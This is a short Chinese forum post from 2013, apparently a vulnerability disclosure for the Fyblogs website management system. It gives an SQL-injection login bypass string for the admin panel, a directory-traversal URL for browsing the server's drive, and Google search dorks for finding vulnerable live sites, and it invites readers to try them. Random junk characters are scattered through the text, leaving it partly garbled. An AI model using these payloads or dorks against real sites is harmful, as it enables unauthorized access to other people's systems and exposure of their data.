漏洞类型: 未授权访问/权限绕过2 t$ {- b" n! t0 I9 c2 D2 |* ~
% p% Y5 r& o, s$ X. V
简要描述:3 G! m7 r8 O9 E G& |, F2 u
6 e- i" s. R& S# _: |
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
+ D d' a2 A% \0 e9 B4 d; `& T
! {+ {5 O. F' T详细说明:
0 a2 ^1 \% a1 v
$ V8 }/ z* t8 a" V4 H" P后台万能密码 'or'='or') P8 y" Z8 E, z2 y, e0 n
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!/ ]9 j2 R" }4 r, ~
admin/uploadfile.asp?currentFolder=/upfiles/../0 i3 V1 ^6 U# _* Y7 B: x4 {0 k
; g+ t+ |/ c2 v
漏洞证明:
# s3 U) J' \* {) {1 E' q3 j, x% }
, O, S& a' U3 z3 F谷歌:inurl:type.asp?id=1 新闻中心" U0 M6 t: z4 _# k' i" k4 S
或者 :inurl:download_ok.asp?) F# Q' S: M% P x; f, X
- [, W* K$ L& K
可以测试
! l3 A6 u0 f4 b9 n# s/ t% p7 D- q% Q4 _: j* M! B: t& y' z! I
% w. y2 b2 m# c" b- m
|
发表于 2013-3-7 13:07:46
收藏
支持
反对